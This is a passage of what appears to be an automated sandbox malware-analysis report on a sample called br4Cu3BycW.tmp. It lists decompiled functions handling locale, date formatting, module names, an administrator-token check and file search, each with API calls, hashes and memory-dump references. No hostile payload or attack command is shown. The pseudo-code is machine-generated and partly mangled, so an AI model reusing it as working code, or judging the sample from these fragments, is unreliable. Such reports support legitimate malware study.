                                                            0x0042f9bf
                                                            0x0042f9c2
                                                            0x0042f9c5
                                                            0x0042f9c8
                                                            0x0042f9cf
                                                            0x0042f9dc
                                                            0x0042fb6d
                                                            0x0042fb73
                                                            0x0042fb8a
                                                            0x0042fbac
                                                            0x0042fbbb
                                                            0x0042fbc7
                                                            0x0042fbce
                                                            0x0042fc88
                                                            0x0042fc95
                                                            0x0042fd0a
                                                            0x0042fd19
                                                            0x0042fd25
                                                            0x0042fd2c
                                                            0x0042fde0
                                                            0x00000000
                                                            0x0042fd32
                                                            0x0042fd3c
                                                            0x0042fdd6
                                                            0x0042fddb
                                                            0x00000000
                                                            0x0042fd3e
                                                            0x0042fd41
                                                            0x0042fd42
                                                            0x0042fd49
                                                            0x0042fd4a
                                                            0x0042fd4f
                                                            0x0042fd52
                                                            0x0042fd55
                                                            0x0042fd5f
                                                            0x0042fd6c
                                                            0x0042fd6e
                                                            0x0042fd6e
                                                            0x0042fd92
                                                            0x0042fd97
                                                            0x0042fd9c
                                                            0x0042fd9f
                                                            0x0042fda2
                                                            0x0042fdaf
                                                            0x0042fdaf
                                                            0x0042fd3c
                                                            0x0042fd0c
                                                            0x0042fd0c
                                                            0x00000000
                                                            0x0042fd0c
                                                            0x0042fc97
                                                            0x0042fc9a
                                                            0x0042fc9b
                                                            0x0042fca2
                                                            0x0042fca3
                                                            0x0042fca8
                                                            0x0042fcab
                                                            0x0042fcb1
                                                            0x0042fcba
                                                            0x0042fcc9
                                                            0x0042fccb
                                                            0x0042fccb
                                                            0x0042fcde
                                                            0x0042fce3
                                                            0x0042fce6
                                                            0x0042fce9
                                                            0x0042fcf6
                                                            0x0042fcf6
                                                            0x0042fbd4
                                                            0x0042fbde
                                                            0x0042fc78
                                                            0x0042fc7d
                                                            0x00000000
                                                            0x0042fbe0
                                                            0x0042fbe3
                                                            0x0042fbe4
                                                            0x0042fbeb
                                                            0x0042fbec
                                                            0x0042fbf1
                                                            0x0042fbf4
                                                            0x0042fbf7
                                                            0x0042fc01
                                                            0x0042fc0e
                                                            0x0042fc10
                                                            0x0042fc10
                                                            0x0042fc34
                                                            0x0042fc39
                                                            0x0042fc3e
                                                            0x0042fc41
                                                            0x0042fc44
                                                            0x0042fc51
                                                            0x0042fc51
                                                            0x0042fbde
                                                            0x0042fbae
                                                            0x0042fbae
                                                            0x00000000
                                                            0x0042fbae
                                                            0x0042fb8c
                                                            0x0042fb98
                                                            0x00000000
                                                            0x0042fb98
                                                            0x0042fb75
                                                            0x0042fb7e
                                                            0x00000000
                                                            0x0042fb7e
                                                            0x0042f9e2
                                                            0x0042f9e5
                                                            0x0042f9fc
                                                            0x0042fa22
                                                            0x0042fa31
                                                            0x0042fa3d
                                                            0x0042fa44
                                                            0x0042fb02
                                                            0x0042fb03
                                                            0x0042fb0a
                                                            0x0042fb0b
                                                            0x0042fb10
                                                            0x0042fb13
                                                            0x0042fb19
                                                            0x0042fb22
                                                            0x0042fb35
                                                            0x0042fb37
                                                            0x0042fb37
                                                            0x0042fb4a
                                                            0x0042fb4f
                                                            0x0042fb52
                                                            0x0042fb55
                                                            0x0042fb62
                                                            0x0042fa4a
                                                            0x0042fa54
                                                            0x0042faf2
                                                            0x0042faf7
                                                            0x00000000
                                                            0x0042fa56
                                                            0x0042fa59
                                                            0x0042fa5a
                                                            0x0042fa61
                                                            0x0042fa62
                                                            0x0042fa67
                                                            0x0042fa6a
                                                            0x0042fa6d
                                                            0x0042fa77
                                                            0x0042fa88
                                                            0x0042fa8a
                                                            0x0042fa8a
                                                            0x0042faae
                                                            0x0042fab3
                                                            0x0042fab8
                                                            0x0042fabb
                                                            0x0042fabe
                                                            0x0042facb
                                                            0x0042facb
                                                            0x0042fa54
                                                            0x0042fa24
                                                            0x0042fa24
                                                            0x00000000
                                                            0x0042fa24
                                                            0x0042f9fe
                                                            0x0042fa0a
                                                            0x00000000
                                                            0x0042fa0a
                                                            0x0042f9e7
                                                            0x0042f9f0
                                                            0x0042fde5
                                                            0x0042fded
                                                            0x0042fded
                                                            0x0042f9e5

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                            • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                            0x0041c79d
                                                            0x0041c7a0
                                                            0x0041c7a2
                                                            0x0041c7a6
                                                            0x0041c7a7
                                                            0x0041c7ac
                                                            0x0041c7af
                                                            0x0041c7b4
                                                            0x0041c7c0
                                                            0x0041c7cb
                                                            0x0041c7d6
                                                            0x0041c7dd
                                                            0x0041c7f6
                                                            0x0041c7df
                                                            0x0041c7e7
                                                            0x0041c7e7
                                                            0x0041c80a
                                                            0x0041c823
                                                            0x0041c832
                                                            0x0041c838
                                                            0x0041c842
                                                            0x0041c846
                                                            0x0041c84b
                                                            0x0041c84b
                                                            0x0041c858
                                                            0x0041c858
                                                            0x0041c838
                                                            0x0041c85f
                                                            0x0041c862
                                                            0x0041c865
                                                            0x0041c872

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DateFormatLocaleThread
                                                            • String ID: $yyyy
                                                            • API String ID: 3303714858-404527807
                                                            • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                            • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                            • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                            0x0041ef0a
                                                            0x0041ef10
                                                            0x0041ef13
                                                            0x0041ef15
                                                            0x0041ef19
                                                            0x0041ef1a
                                                            0x0041ef1f
                                                            0x0041ef22
                                                            0x0041ef2f
                                                            0x0041ef3e
                                                            0x0041ef6e
                                                            0x0041ef7a
                                                            0x0041ef7f
                                                            0x0041ef85
                                                            0x0041ef85
                                                            0x0041efa7
                                                            0x0041efac
                                                            0x0041efb1
                                                            0x0041efb8
                                                            0x0041efc5
                                                            0x0041efcf
                                                            0x0041efd3
                                                            0x0041efda
                                                            0x0041efe4
                                                            0x0041efe4
                                                            0x0041efda
                                                            0x0041eff5
                                                            0x0041effa
                                                            0x0041f009
                                                            0x0041f016
                                                            0x0041f021
                                                            0x0041f027
                                                            0x0041f034
                                                            0x0041f03a
                                                            0x0041f044
                                                            0x0041f04a
                                                            0x0041f051
                                                            0x0041f057
                                                            0x0041f05e
                                                            0x0041f064
                                                            0x0041f080
                                                            0x0041f088
                                                            0x0041f091
                                                            0x0041f094
                                                            0x0041f097
                                                            0x0041f0a7

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                            • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                            • String ID:
                                                            • API String ID: 3990497365-0
                                                            • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                            • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                            • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                            0x0040a6d0
                                                            0x0040a6d2
                                                            0x0040a6d6
                                                            0x0040a6e2
                                                            0x0040a6ec
                                                            0x0040a6ef
                                                            0x0040a6f1
                                                            0x0040a6f8
                                                            0x0040a6fb
                                                            0x0040a70c
                                                            0x0040a712
                                                            0x0040a715
                                                            0x0040a718
                                                            0x0040a71b
                                                            0x0040a721
                                                            0x0040a727
                                                            0x0040a737
                                                            0x0040a737
                                                            0x0040a740
                                                            0x0040a745
                                                            0x0040a749
                                                            0x0040a74e
                                                            0x0040a753
                                                            0x0040a755
                                                            0x0040a756
                                                            0x0040a75d
                                                            0x0040a765
                                                            0x0040a76a
                                                            0x0040a76a
                                                            0x0040a770
                                                            0x0040a773
                                                            0x0040a773
                                                            0x0040a75d
                                                            0x0040a77a
                                                            0x0040a781
                                                            0x0040a781
                                                            0x0040a78a
                                                            0x0040a794
                                                            0x0040a7a2
                                                            0x0040a7aa
                                                            0x0040a7c7
                                                            0x0040a7c7
                                                            0x0040a7cf
                                                            0x00000000
                                                            0x0040a7d7
                                                            0x0040a7e1

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                              • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                            • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                            • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                            0x00420bde
                                                            0x00420be3
                                                            0x00420be7
                                                            0x00420bef
                                                            0x00420bf4
                                                            0x00420bf4
                                                            0x00420c00
                                                            0x00420c07
                                                            0x00000000
                                                            0x00420c07
                                                            0x00420c0d

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                            • API String ID: 1646373207-1127948838
                                                            • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                            • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                            • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: br4Cu3BycW.tmp PID: 5816 Parent PID: 4352 br4Cu3BycW.tmpCOMMON

                                                            Executed Functions

                                                            Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                            • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                            • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                            • API String ID: 2691416632-1888249752
                                                            • Opcode ID: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                            • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                            • Opcode Fuzzy Hash: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
                                                            • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                              • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                              • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                            • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                            • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                            • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileFindFirstLast
                                                            • String ID:
                                                            • API String ID: 873889042-0
                                                            • Opcode ID: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                            • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                            • Opcode Fuzzy Hash: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
                                                            • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

